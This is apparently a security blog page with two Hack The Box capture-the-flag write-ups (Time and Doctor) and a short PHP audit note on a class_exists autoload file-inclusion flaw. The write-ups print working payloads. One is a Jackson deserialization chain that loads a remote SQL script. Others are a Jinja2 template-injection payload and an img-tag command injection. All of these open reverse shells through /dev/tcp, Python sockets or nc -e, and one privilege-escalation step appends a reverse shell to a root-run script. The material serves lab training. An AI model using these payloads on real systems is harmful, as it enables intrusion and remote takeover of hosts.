Ikonw

HTB Time Writeup

image-20201107200513767

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 20:06 +08
Nmap scan report for 10.10.10.214
Host is up (0.0074s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds


Start to enumerate at the http port

Not able to find other directory other than the index page

image-20201107200901834

Guess this is the only route to user

Tried different input

image-20201107201052773

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

Found some error message.

After googling, with the keyword fasterxml and jackson

we found this CVE

Create a inject.sql with bash reverse shell

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')

Start a python server

python -m SimpleHTTPServer 8000

Also start a listner

nc -nvlp 8080

Finally our payload

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://x.x.x.x/inject.sql'"}]

​ And we got our reverse shell back

image-20201107204418416

Privilege escalation

After some enumeration manage to find something interesting using PSPY64

image-20201107194832954

/usr/bin/timer_backup.sh is run by Root

-rwxrw-rw- 1 pericles pericles 88 Nov 7 12:50 /usr/bin/timer_backup.sh

We have write permission.

echo "bash -i >& /dev/tcp/10.10.14.22/5555 0>&1" >> /usr/bin/timer_backup.sh

and we get a easy root. But the nc will exit somehow less than 30second, another method is to write your public key and enter in SSH

listening on [any] 5555 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.214] 33944
bash: cannot set terminal process group (230926): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# whoami && id && hostname
whoami && id && hostname
root
uid=0(root) gid=0(root) groups=0(root)
time
root@time:/# exit



root

hackthebox
hackthebox medium
Continue
HTB Doctor Writeup

image-20201009214428794

Author Ikonw

Nmap

# Nmap 7.80 scan initiated Sun Sep 27 09:39:47 2020 as: nmap -Pn -sCV -p22,80,8089 -oN nmap/Full_10.129.11.0.nmap 10.129.11.0
Nmap scan report for doctor.htb (10.129.11.0)
Host is up (0.25s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Start enumeration on port 80, found the info@doctors.htb email.

Let’s add the hostname doctors.htb to /etc/hosts

image-20201009214518677

After adding to host file, visit doctors.htb come to a login page

image-20201009214618490

Tried to use info@doctors.htb to login, with the reset password function, we can verify that info@doctors.htb is not a valid account.

image-20201009214740397

Once we register, there’s only one function.

image-20201009214919652

From the page source, we found /archive but it appears to be blank page

image-20201009214950290

The New Post is vulnerable to server site template injection

Server Side Template Injection Payloads

image-20201009220337033

When we input {{7*7}} , we notice that it is shown on the /archive page.

can confirmed that it is using either Twig or Jinja2

Next up, craft a malicious payload to obtain reverse connecction

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.67\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read()}}{%endif%}{%endfor%}

Another way would be using malicious curl command, this seems the unintended way

<img src=http://10.10.14.67:1337/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.67'$IFS'4444')>

image-20201010132416445

WWW-data to User

Went to /home directory we found user shaun

Found user password in /var/log/apache/backup

And we can switch to user shaun.

Using the privilege escalation suggester we got the splunk is vulnerable.

By using the https://github.com/cnotin/SplunkWhisperer2 we are able to get privileges’ to root

Initial foothold is more annoying, from www-data to user to root is easy




root

hackthebox
hackthebox easy
Continue
PHP::in_array() Type Juggling 
<?php
function __autoload($className) {
    include $className;
}

$controllerName = $_GET['c'];
$data = $_GET['d'];

if (class_exists($controllerName)) {
    $controller = new $controllerName($data);
    $controller->render();
} else {
    echo 'There is no page with this name';
}

class HomeController {
    private $data;

    public function __construct($data) {
        $this->data = $data;
    }

    public function render() {
        if ($this->data['new']) {
            echo 'controller rendering new response';
        } else {
            echo 'controller rendering old response';
        }
    }
}
?>

First vulnerability in line 9, according to PHP manual.

#class_exists

class_exists - This function checks whether or not the given class has been definded

class_exists ( string $class_name, bool $autoload = true) : bool

##Parameter

class_name
The class name. THe name is matched in a case-insensitive manner.

auto_load
Whether or not to call __autoload by default

In this case, the class_exists function will check if the controller name we pass in is a valid, but it will first have to called the autoload function making sure all the function is loaded. When this happens, it actually includes the unknown $classname parameter we passed in.

php-audit
PHP,in_array(),type-juggling
Continue
Home Archives Tags About Search